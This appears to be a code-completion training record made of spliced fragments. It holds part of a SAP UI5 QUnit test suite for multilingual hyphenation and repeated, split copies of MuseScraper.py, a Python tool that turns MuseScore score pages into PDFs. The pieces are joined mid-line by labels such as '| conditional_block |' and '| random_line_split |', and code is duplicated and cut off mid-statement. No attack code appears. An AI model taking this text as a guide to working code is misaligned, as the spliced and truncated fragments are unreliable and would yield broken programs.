Device,
createAndAppendDiv,
Configuration
) {
"use strict";
var sSingleLangTest = "de",
aSupportedLanguages = [
"bg",
"ca",
"hr",
"da",
"nl",
"en",
"et",
"fi",
"fr",
"de",
"el",
"hi",
"hu",
"it",
"lt",
"no",
"pt",
"ru",
"sl",
"es",
"sv",
"th",
"tr",
"uk"
],
aLanguagesWithNoThirdParty = [
"cs", "pl", "sr"
],
aNotSupportedLanguages = [
"mn", "vi", "test-lang"
],
mWords = {
// lang: [not hyphenated, hyphenated]
"bg": ["непротивоконституционствувателствувайте", "неп\u00ADро\u00ADти\u00ADво\u00ADкон\u00ADс\u00ADти\u00ADту\u00ADци\u00ADон\u00ADс\u00ADт\u00ADву\u00ADва\u00ADтел\u00ADс\u00ADт\u00ADву\u00ADвайте"],
"ca": ["Psiconeuroimmunoendocrinologia", "Psi\u00ADco\u00ADneu\u00ADroim\u00ADmu\u00ADno\u00ADen\u00ADdo\u00ADcri\u00ADno\u00ADlo\u00ADgia"],
"hr": ["prijestolonasljednikovičičinima", "pri\u00ADjes\u00ADto\u00ADlo\u00ADna\u00ADs\u00ADljed\u00ADni\u00ADko\u00ADvi\u00ADči\u00ADči\u00ADnima"],
"da": ["Gedebukkebensoverogundergeneralkrigskommander", "Gede\u00ADbuk\u00ADke\u00ADben\u00ADsoverogun\u00ADder\u00ADge\u00ADne\u00ADral\u00ADkrigskom\u00ADman\u00ADder"], // original word was Gedebukkebensoverogundergeneralkrigskommandersergenten
"nl": ["meervoudigepersoonlijkheidsstoornissen", "meer\u00ADvou\u00ADdi\u00ADge\u00ADper\u00ADsoon\u00ADlijk\u00ADheids\u00ADstoor\u00ADnis\u00ADsen"],
"en": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-gb": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-us": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"et": ["Sünnipäevanädalalõpupeopärastlõunaväsimus", "Sün\u00ADni\u00ADpäe\u00ADva\u00ADnä\u00ADda\u00ADla\u00ADlõ\u00ADpu\u00ADpeo\u00ADpä\u00ADrast\u00ADlõu\u00ADna\u00ADvä\u00ADsi\u00ADmus"],
"fi": ["kolmivaihekilowattituntimittari", "kolmivaihekilowattituntimittari"],
"fr": ["hippopotomonstrosesquippedaliophobie", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmons\u00ADtro\u00ADses\u00ADquip\u00ADpe\u00ADda\u00ADlio\u00ADpho\u00ADbie"],
"de": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"], // original word was Kindercarnavalsoptochtvoorbereidingswerkzaamhedenplan
"de-at": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"],
"el": ["ηλεκτροεγκεφαλογράφημα", "ηλε\u00ADκτρο\u00ADε\u00ADγκε\u00ADφα\u00ADλο\u00ADγρά\u00ADφημα"],
"hi": ["किंकर्तव्यविमूढ़", "किं\u00ADक\u00ADर्त\u00ADव्य\u00ADवि\u00ADमूढ़"],
"hu": ["Megszentségteleníthetetlenségeskedéseitekért", "Meg\u00ADszent\u00ADség\u00ADte\u00ADle\u00ADnít\u00ADhe\u00ADtet\u00ADlen\u00ADsé\u00ADges\u00ADke\u00ADdé\u00ADse\u00ADi\u00ADte\u00ADkért"],
"it": ["hippopotomonstrosesquippedaliofobia", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmon\u00ADstro\u00ADse\u00ADsquip\u00ADpe\u00ADda\u00ADlio\u00ADfo\u00ADbia"],
"lt": ["nebeprisikiškiakopūstlapiaujančiuosiuose", "nebe\u00ADpri\u00ADsi\u00ADkiš\u00ADkia\u00ADko\u00ADpūst\u00ADla\u00ADpiau\u00ADjan\u00ADčiuo\u00ADsiuose"],
"no": ["Omtrentlig", "Omtrent\u00ADlig"],
"pt": ["pneumoultramicroscopicossilicovulcanoconiose", "pneu\u00ADmoul\u00ADtra\u00ADmi\u00ADcros\u00ADco\u00ADpi\u00ADcos\u00ADsi\u00ADli\u00ADco\u00ADvul\u00ADca\u00ADno\u00ADco\u00ADni\u00ADose"],
"ru": ["превысокомногорассмотрительствующий", "пре\u00ADвы\u00ADсо\u00ADком\u00ADно\u00ADго\u00ADрас\u00ADсмот\u00ADри\u00ADтель\u00ADству\u00ADю\u00ADщий"],
"sl": ["Dialektičnomaterialističen", "Dia\u00ADlek\u00ADtič\u00ADno\u00ADma\u00ADte\u00ADri\u00ADa\u00ADli\u00ADsti\u00ADčen"],
"es": ["Electroencefalografistas", "Elec\u00ADtro\u00ADen\u00ADce\u00ADfa\u00ADlo\u00ADgra\u00ADfis\u00ADtas"],
"sv": ["Realisationsvinstbeskattning", "Rea\u00ADli\u00ADsa\u00ADtions\u00ADvinst\u00ADbe\u00ADskatt\u00ADning"],
"th": ["ตัวอย่างข้อความที่จะใช้ใน", "ตัว\u00ADอย่าง\u00ADข้อ\u00ADความ\u00ADที่จะ\u00ADใช้ใน"],
"tr": ["Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine", "Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine"],
"uk": ["Нікотинамідаденіндинуклеотидфосфат", "Ніко\u00ADти\u00ADна\u00ADмі\u00ADда\u00ADде\u00ADнін\u00ADди\u00ADну\u00ADкле\u00ADо\u00ADтид\u00ADфо\u00ADсфат"]
},
mCompoundWords = {
"en": ["factory-made", "fac\u00ADtory-\u200bmade"],
"de": ["Geheimzahl-Aufschreiber", "Geheim\u00ADzahl-\u200bAuf\u00ADschrei\u00ADber"]
},
mTexts = {
// lang: [not hyphenated, hyphenated]
"en": [
"A hyphenation algorithm is a set of rules that decides at which points a word can be broken over two lines with a hyphen.",
"A hyphen\u00ADation algo\u00ADrithm is a set of rules that decides at which points a word can be bro\u00ADken over two lines with a hyphen."
],
"de": [
"Die Worttrennung, auch Silbentrennung genannt, bezeichnet in der Orthographie die Art und Weise, wie die Wörter insbesondere am Zeilenende getrennt werden können.",
"Die Wort\u00ADtren\u00ADnung, auch Sil\u00ADben\u00ADtren\u00ADnung genannt, bezeich\u00ADnet in der Ortho\u00ADgra\u00ADphie die Art und Weise, wie die Wör\u00ADter ins\u00ADbe\u00ADson\u00ADdere am Zei\u00ADlen\u00ADende getrennt wer\u00ADden kön\u00ADnen."
],
"ru": [
"Пример текста, который будет служить для проверки перевода.",
"При\u00ADмер тек\u00ADста, кото\u00ADрый будет слу\u00ADжить для про\u00ADверки пере\u00ADвода."
]
};
function getDefaultLang() {
var oLocale = Configuration.getLocale(),
sLanguage = oLocale.getLanguage().toLowerCase();
return sLanguage;
}
var oTestDiv = createAndAppendDiv('tst1');
oTestDiv.style.cssText = [
"-moz-hyphens:auto;",
"-webkit-hyphens:auto;",
"hyphens:auto;",
"width:48px;",
"font-size:12px;",
"line-height:12px;",
"border:none;",
"padding:0;",
"word-wrap:normal"
].join("");
function canUseNativeHyphenationRaw() {
var sLanguageOnThePage = document.documentElement.getAttribute("lang").toLowerCase();
var sMappedLanguage = Configuration.getLocale().getLanguage().toLowerCase();
// adjustment of the language to correspond to Hyphenopoly pattern files (.hpb files)
switch (sMappedLanguage) {
case "en":
sMappedLanguage = "en-us";
break;
case "nb":
sMappedLanguage = "nb-no";
break;
case "no":
sMappedLanguage = "nb-no";
break;
case "el":
sMappedLanguage = "el-monoton";
break;
default:
break;
}
// we don't have a word to test for this language
if (!HyphenationTestingWords[sMappedLanguage]) {
return false;
}
oTestDiv.lang = sLanguageOnThePage;
oTestDiv.innerText = HyphenationTestingWords[sMappedLanguage];
// Chrome on macOS partially supported native hyphenation. It didn't hyphenate one word more than once.
if (Device.os.macintosh && Device.browser.chrome) {
return oTestDiv.offsetHeight > 24; // check if word is hyphenated more than once
}
return oTestDiv.offsetHeight > 12;
}
QUnit.module("Instance");
QUnit.test("create instance", function(assert) {
var oHyphenation = Hyphenation.getInstance();
assert.ok(oHyphenation, "instance is created");
assert.strictEqual(oHyphenation.isA("sap.ui.core.hyphenation.Hyphenation"), true, "instance is correct");
});
QUnit.module("Initialization", {
before: function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("default initialize", function(assert) {
assert.expect(1);
var done = assert.async();
this.oHyphenation.initialize().then(function() {
var sDefaultLang = getDefaultLang();
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sDefaultLang), true, "default lang '" + sDefaultLang + "' was initialized");
done();
}.bind(this));
});
QUnit.test("initialize only single language - " + sSingleLangTest, function(assert) {
assert.expect(2);
var done = assert.async();
this.oHyphenation.initialize(sSingleLangTest).then(function() {
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sSingleLangTest), true, "hyphenation api is initialized with language - " + sSingleLangTest);
assert.ok(this.oHyphenation.getInitializedLanguages().indexOf(sSingleLangTest) > -1, "list of initialized languages contains " + sSingleLangTest);
done();
}.bind(this)).catch(function(e) {
assert.ok(false, e);
});
});
// WebAssembly is not supported in all browsers.
if (window.WebAssembly) {
QUnit.test("Multiple initialization calls", function(assert) {
// Arrange
var done = assert.async();
var iForcedInitializations = 300;
var oSpy = this.spy(window.WebAssembly, "instantiate");
// Initialize the default language and after that try to force multiple initializations.
this.oHyphenation.initialize().then(function() {
oSpy.resetHistory();
var aPromises = [];
// Act
for (var i = 0; i < iForcedInitializations; i++) {
aPromises.push(new Promise(function (resolve) {
this.oHyphenation.initialize()
.then(resolve)
.catch(resolve);
}.bind(this)));
}
Promise.all(aPromises).then(function () {
// Assert
assert.ok(oSpy.notCalled, "Should only initialize once to avoid browser out of memory exceptions.");
// Clean up
oSpy.restore();
done();
});
}.bind(this));
});
}
QUnit.test("is language supported", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), true, sLang + " is supported");
});
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), false, sLang + " is not supported");
});
});
QUnit.test("initialize all supported languages", function(assert) {
assert.expect(aSupportedLanguages.length + 1);
var done = assert.async(),
that = this,
counter = 0;
aSupportedLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), true, sLang + " is initialized");
if (counter >= aSupportedLanguages.length) {
assert.strictEqual(that.oHyphenation.getInitializedLanguages().length, aSupportedLanguages.length, "all languages are initialized");
done();
}
}).catch(function(e) {
assert.ok(false, e);
});
});
});
QUnit.test("fail to initialize not supported languages", function(assert) {
assert.expect(aNotSupportedLanguages.length * 2);
var done = assert.async(),
that = this,
counter = 0;
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), false, sLang + " is by default not initialized");
that.oHyphenation.initialize(sLang).then(function() {
assert.ok(false, "not supported language '" + sLang + "' was initialized");
}).catch(function(e) {
counter++;
assert.ok(true, sLang + " is not supported");
if (counter === aNotSupportedLanguages.length) {
done();
}
});
});
});
QUnit.module("Hyphenation", {
before : function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("can use third party hyphenation", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), true, sLang + " is supported");
});
aLanguagesWithNoThirdParty.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), false, sLang + " is not supported"); | test("can use native hyphenation", function(assert) {
assert.strictEqual(canUseNativeHyphenationRaw(), this.oHyphenation.canUseNativeHyphenation(), "The Hyphenation instance should give the same result as the raw check.");
});
QUnit.test("hyphenate example words", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mWords);
assert.expect(aLanguages.length + Object.keys(mCompoundWords).length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mWords[sLang][0], sLang),
mWords[sLang][1],
"hyphenation of example word for '" + sLang + "' is ok"
);
if (mCompoundWords.hasOwnProperty(sLang)) {
assert.strictEqual(
that.oHyphenation.hyphenate(mCompoundWords[sLang][0], sLang),
mCompoundWords[sLang][1],
"compound word hyphenation for '" + sLang + "' is ok"
);
}
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("hyphenate example texts", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mTexts);
assert.expect(aLanguages.length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mTexts[sLang][0], sLang),
mTexts[sLang][1],
"hyphenation of example text for '" + sLang + "' is ok"
);
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("fail to hyphenate with not initialized language", function(assert) {
var oErrorLogSpy = this.spy(Log, "error"),
onError = function() {
assert.ok(true, "error event was thrown");
};
this.oHyphenation.attachEvent("error", onError);
assert.strictEqual(this.oHyphenation.hyphenate("Lorem ipsum", "test-lang"), "Lorem ipsum", "hyphenate of uninitialized lang returns the same text without changes");
assert.ok(oErrorLogSpy.calledOnce, "an error was logged");
Log.error.restore();
this.oHyphenation.detachEvent("error", onError);
});
QUnit.module("Hyphenopoly_Loader and Hyphenopoly.js overrides");
QUnit.test("No credentials are sent when request is made", function (assert) {
// Arrange
var done = assert.async();
var oFetchSpy = sinon.spy(window, "fetch");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
error: function () {
// Assert
assert.notOk(
oFetchSpy.calledWith(sinon.match.any, { credentials: "include" }),
"Credentials must NOT be included in the request"
);
// Clean up
oFetchSpy.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
QUnit.test("Auto fallback to asm.js when wasm is not allowed", function (assert) {
// Arrange
var done = assert.async();
var oWasmInstanceStub = sinon.stub(WebAssembly, "Instance").throws("WebAssembly can't be used due to CSP restrictions.");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
engineReady: function (e) {
// Assert
assert.strictEqual(window.Hyphenopoly.cf.wasm, false);
// Clean up
oWasmInstanceStub.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
});
|
});
});
QUnit. | conditional_block |
MuseScraper.py | #!/usr/bin/env python3
from typing import Union, Optional, Any, List, Dict
import os
import sys
from pkgutil import get_data
from abc import ABC
import pyppeteer
import asyncio
import requests
import io
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPDF
from PyPDF2 import PdfFileMerger
from pathlib import Path, PurePath
import platform
from PIL import Image
import time
import re
from urllib.parse import urlparse, quote
import logging
from logging import StreamHandler
import warnings
from operator import itemgetter
from .helper import _valid_url
class BaseMuseScraper(ABC):
def __init__(
self,
*,
debug_log: Union[None, str, Path],
timeout: float,
quiet: bool,
proxy_server: Optional[str],
):
self._debug: bool = debug_log is not None
self.timeout: float = timeout
self.closed: bool = False
self.proxy_server: Optional[str] = proxy_server
logging_kwargs: Dict[str, Any] = {}
log_level: int = (logging.DEBUG if debug_log else
logging.INFO if not quiet else
logging.WARNING
)
logging_kwargs["level"] = log_level
if debug_log:
logging_kwargs["filename"] = Path(debug_log)
# Why the hell did pyppeteer set the handler for themselves?
# They should've used logging.basicConfig() for fuck's sake
pyppeteer._logger.removeHandler(pyppeteer._log_handler)
pyppeteer_log_handler: logging.FileHandler = logging.FileHandler(debug_log)
pyppeteer_log_handler.setFormatter(pyppeteer._formatter)
pyppeteer._logger.addHandler(pyppeteer_log_handler)
logging.basicConfig(**logging_kwargs)
self._logger: logging.Logger = logging.getLogger(__name__)
async def _close(self) -> None:
if not self.closed:
await self._browser.close()
self.closed = True
else:
warnings.warn("Already closed.", RuntimeWarning)
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
page: pyppeteer.page.Page = await self._browser.newPage()
try:
page.setDefaultNavigationTimeout(0)
await page.setViewport({ "width" : 1000, "height" : 1000 } )
response: pyppeteer.network_manager.Response = await page.goto(url, timeout=0)
if not response.ok:
raise ConnectionError(f"Received <{response.status}> response.")
score_name: str = (
await (await (
await page.querySelector("h1")).getProperty("innerText")).jsonValue())
score_creator: str = await (await (
await page.querySelector("h2")).getProperty("innerText")).jsonValue()
async def get_score_release_date() -> int:
for h2 in await page.querySelectorAll("aside h2"):
match: Optional[re.Match] = re.fullmatch(
r"Uploaded\son\s(?P<month>[A-Z][a-z]{2})\s(?P<day>\d{1,2}),\s(?P<year>\d{4})",
await (await h2.getProperty("innerText")).jsonValue()
)
if match is not None:
break
return int(time.mktime(time.strptime(match.group("month")
+ ' ' + match.group("day").zfill(2)
+ ' ' + match.group("year"), "%b %d %Y")))
async def get_score_tags() -> str:
tags: List[str] = []
for span in await page.querySelectorAll("aside section span"):
text: str = str(await (await span.getProperty("innerText")).jsonValue())
if ((await (await (await span.getProperty(
"parentElement")).getProperty(
"href")).jsonValue()) ==
"https://musescore.com/sheetmusic?tags=" + quote(text)):
tags.append(text)
return ','.join(tags)
info_dict: Dict[str, str] = {
"Title": score_name,
"Creator": score_creator,
# "Date released": str(await get_score_release_date()),
"Keywords": await get_score_tags(),
}
imgs: List[str] = await page.evaluate(str(get_data("musescore_scraper",
"script.js",
), "utf-8"))
except:
raise
finally:
await page.close()
return {
"imgs" : imgs,
"info": info_dict,
}
def _convert(self, output: Union[None, str, Path], data: Dict[str, Any]) -> Path:
imgs, info_dict = itemgetter("imgs", "info")(data)
for k, v in info_dict.items():
self._logger.info(f'Collected "{k}" metadata from score: "{v}"')
merger: PdfFileMerger = PdfFileMerger()
def to_pdf_f(img_ext: str, contents: io.BytesIO) -> io.BytesIO:
if img_ext.startswith(".svg"):
return io.BytesIO(renderPDF.drawToString(svg2rlg(contents)))
elif img_ext.startswith(".png"):
stream: io.BytesIO = io.BytesIO()
img: Image = Image.open(contents, formats=["png"])
if img.mode == "RGBA":
img = img.convert("RGB")
img.save(stream, format="PDF")
stream.seek(0)
return stream
else:
raise NotImplementedError("Found a non-implemented image type used in given score.")
for img in imgs:
if self.proxy_server:
response: requests.Response = requests.get(img, proxies={
"http" : self.proxy_server,
"https" : self.proxy_server,
})
else:
response: requests.Response = requests.get(img)
response.raise_for_status()
img_ext: str = PurePath(urlparse(img).path).suffix
merger.append(to_pdf_f(img_ext, io.BytesIO(response.content)))
merger.addMetadata({ ('/' + k): v for k, v in info_dict.items() })
def eval_expression(input_string: str) -> str:
windows_regex: str = r"[\x00-\x1f\"*/:<>?\\|]"
darwin_regex: str = r"[: ]"
linux_regex: str = (r"[\x00/]"
if not {"is_wsl", "wsl_distro_name"} <= os.environ.keys()
else windows_regex
)
return locals()[input_string]
if isinstance(output, str) and output:
output = Path(output)
if not output or output.is_dir():
parent_folder: Optional[Path] = output
output = Path(re.sub(eval_expression(
platform.system().lower() + "_regex"), '_', info_dict["Title"]))
if parent_folder:
output = parent_folder / output
output = output.with_suffix(".pdf")
if self._debug and Path().resolve().is_relative_to(Path(__file__).parents[1]):
pdfs_folder: Path = Path("PDFs")
if not pdfs_folder.is_dir():
pdfs_folder.mkdir()
output = Path("PDFs") / output
if self._debug:
output = output.with_stem(time.strftime("%Y%m%d-%H%M%S") + ' ' + output.stem)
will_rewrite: bool = output.is_file()
with output.open("wb") as o:
merger.write(o)
output = output.resolve()
log_message: str = f'PDF { "over" * int(will_rewrite) }written to'
try:
self._logger.info(f'{log_message} "{output.relative_to(Path().resolve())}"')
except ValueError:
self._logger.info(f'{log_message} "{output}"')
return output
async def _run(self, url: str, output: Union[None, str, Path]) -> Path:
if not _valid_url(url):
raise TypeError("Invalid URL.")
return self._convert(output, await self._pyppeteer_main(url))
class AsyncMuseScraper(BaseMuseScraper):
async def _check_browser(self) -> None:
for task in asyncio.all_tasks():
if task.get_name() == str(id(self)):
self._browser = await task
break
| quiet: bool = False,
proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
task: asyncio.Task = asyncio.create_task(
pyppeteer.launch({"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] }
), name=id(self))
else:
task: asyncio.Task = asyncio.create_task(pyppeteer.launch(), name=id(self))
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
locs = locals()
await self._check_browser()
return await super()._pyppeteer_main(
**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
async def close(self) -> None:
"""
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
await self._check_browser()
await super()._close()
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_value, exc_traceback) -> None:
await self.close()
async def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL asynchronously.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return await (asyncio.wait_for(self._run(url, output), self.timeout)
if self.timeout >= 0.01 else self._run(url, output)
)
class MuseScraper(BaseMuseScraper):
def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120,
quiet: bool = False,
proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch(
{"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] },
)
)
else:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch()
)
def __enter__(self):
return self
def close(self) -> None:
"""
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
asyncio.get_event_loop().run_until_complete(super()._close())
def __exit__(self, exc_type, exc_value, exc_traceback) -> None:
self.close()
def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return asyncio.get_event_loop().run_until_complete(
asyncio.wait_for(self._run(url, output), self.timeout) if self.timeout >= 0.01 else
self._run(url, output)
) | def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120, | random_line_split |
MuseScraper.py | #!/usr/bin/env python3
from typing import Union, Optional, Any, List, Dict
import os
import sys
from pkgutil import get_data
from abc import ABC
import pyppeteer
import asyncio
import requests
import io
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPDF
from PyPDF2 import PdfFileMerger
from pathlib import Path, PurePath
import platform
from PIL import Image
import time
import re
from urllib.parse import urlparse, quote
import logging
from logging import StreamHandler
import warnings
from operator import itemgetter
from .helper import _valid_url
class BaseMuseScraper(ABC):
def __init__(
self,
*,
debug_log: Union[None, str, Path],
timeout: float,
quiet: bool,
proxy_server: Optional[str],
):
self._debug: bool = debug_log is not None
self.timeout: float = timeout
self.closed: bool = False
self.proxy_server: Optional[str] = proxy_server
logging_kwargs: Dict[str, Any] = {}
log_level: int = (logging.DEBUG if debug_log else
logging.INFO if not quiet else
logging.WARNING
)
logging_kwargs["level"] = log_level
if debug_log:
logging_kwargs["filename"] = Path(debug_log)
# Why the hell did pyppeteer set the handler for themselves?
# They should've used logging.basicConfig() for fuck's sake
pyppeteer._logger.removeHandler(pyppeteer._log_handler)
pyppeteer_log_handler: logging.FileHandler = logging.FileHandler(debug_log)
pyppeteer_log_handler.setFormatter(pyppeteer._formatter)
pyppeteer._logger.addHandler(pyppeteer_log_handler)
logging.basicConfig(**logging_kwargs)
self._logger: logging.Logger = logging.getLogger(__name__)
async def _close(self) -> None:
if not self.closed:
await self._browser.close()
self.closed = True
else:
warnings.warn("Already closed.", RuntimeWarning)
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
page: pyppeteer.page.Page = await self._browser.newPage()
try:
page.setDefaultNavigationTimeout(0)
await page.setViewport({ "width" : 1000, "height" : 1000 } )
response: pyppeteer.network_manager.Response = await page.goto(url, timeout=0)
if not response.ok:
raise ConnectionError(f"Received <{response.status}> response.")
score_name: str = (
await (await (
await page.querySelector("h1")).getProperty("innerText")).jsonValue())
score_creator: str = await (await (
await page.querySelector("h2")).getProperty("innerText")).jsonValue()
async def get_score_release_date() -> int:
for h2 in await page.querySelectorAll("aside h2"):
match: Optional[re.Match] = re.fullmatch(
r"Uploaded\son\s(?P<month>[A-Z][a-z]{2})\s(?P<day>\d{1,2}),\s(?P<year>\d{4})",
await (await h2.getProperty("innerText")).jsonValue()
)
if match is not None:
break
return int(time.mktime(time.strptime(match.group("month")
+ ' ' + match.group("day").zfill(2)
+ ' ' + match.group("year"), "%b %d %Y")))
async def get_score_tags() -> str:
tags: List[str] = []
for span in await page.querySelectorAll("aside section span"):
text: str = str(await (await span.getProperty("innerText")).jsonValue())
if ((await (await (await span.getProperty(
"parentElement")).getProperty(
"href")).jsonValue()) ==
"https://musescore.com/sheetmusic?tags=" + quote(text)):
tags.append(text)
return ','.join(tags)
info_dict: Dict[str, str] = {
"Title": score_name,
"Creator": score_creator,
# "Date released": str(await get_score_release_date()),
"Keywords": await get_score_tags(),
}
imgs: List[str] = await page.evaluate(str(get_data("musescore_scraper",
"script.js",
), "utf-8"))
except:
raise
finally:
await page.close()
return {
"imgs" : imgs,
"info": info_dict,
}
def _convert(self, output: Union[None, str, Path], data: Dict[str, Any]) -> Path:
imgs, info_dict = itemgetter("imgs", "info")(data)
for k, v in info_dict.items():
self._logger.info(f'Collected "{k}" metadata from score: "{v}"')
merger: PdfFileMerger = PdfFileMerger()
def to_pdf_f(img_ext: str, contents: io.BytesIO) -> io.BytesIO:
if img_ext.startswith(".svg"):
return io.BytesIO(renderPDF.drawToString(svg2rlg(contents)))
elif img_ext.startswith(".png"):
stream: io.BytesIO = io.BytesIO()
img: Image = Image.open(contents, formats=["png"])
if img.mode == "RGBA":
img = img.convert("RGB")
img.save(stream, format="PDF")
stream.seek(0)
return stream
else:
raise NotImplementedError("Found a non-implemented image type used in given score.")
for img in imgs:
if self.proxy_server:
response: requests.Response = requests.get(img, proxies={
"http" : self.proxy_server,
"https" : self.proxy_server,
})
else:
response: requests.Response = requests.get(img)
response.raise_for_status()
img_ext: str = PurePath(urlparse(img).path).suffix
merger.append(to_pdf_f(img_ext, io.BytesIO(response.content)))
merger.addMetadata({ ('/' + k): v for k, v in info_dict.items() })
def eval_expression(input_string: str) -> str:
windows_regex: str = r"[\x00-\x1f\"*/:<>?\\|]"
darwin_regex: str = r"[: ]"
linux_regex: str = (r"[\x00/]"
if not {"is_wsl", "wsl_distro_name"} <= os.environ.keys()
else windows_regex
)
return locals()[input_string]
if isinstance(output, str) and output:
output = Path(output)
if not output or output.is_dir():
parent_folder: Optional[Path] = output
output = Path(re.sub(eval_expression(
platform.system().lower() + "_regex"), '_', info_dict["Title"]))
if parent_folder:
output = parent_folder / output
output = output.with_suffix(".pdf")
if self._debug and Path().resolve().is_relative_to(Path(__file__).parents[1]):
pdfs_folder: Path = Path("PDFs")
if not pdfs_folder.is_dir():
pdfs_folder.mkdir()
output = Path("PDFs") / output
if self._debug:
output = output.with_stem(time.strftime("%Y%m%d-%H%M%S") + ' ' + output.stem)
will_rewrite: bool = output.is_file()
with output.open("wb") as o:
merger.write(o)
output = output.resolve()
log_message: str = f'PDF { "over" * int(will_rewrite) }written to'
try:
self._logger.info(f'{log_message} "{output.relative_to(Path().resolve())}"')
except ValueError:
self._logger.info(f'{log_message} "{output}"')
return output
async def _run(self, url: str, output: Union[None, str, Path]) -> Path:
if not _valid_url(url):
raise TypeError("Invalid URL.")
return self._convert(output, await self._pyppeteer_main(url))
class AsyncMuseScraper(BaseMuseScraper):
async def _check_browser(self) -> None:
for task in asyncio.all_tasks():
if task.get_name() == str(id(self)):
self._browser = await task
break
def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120,
quiet: bool = False,
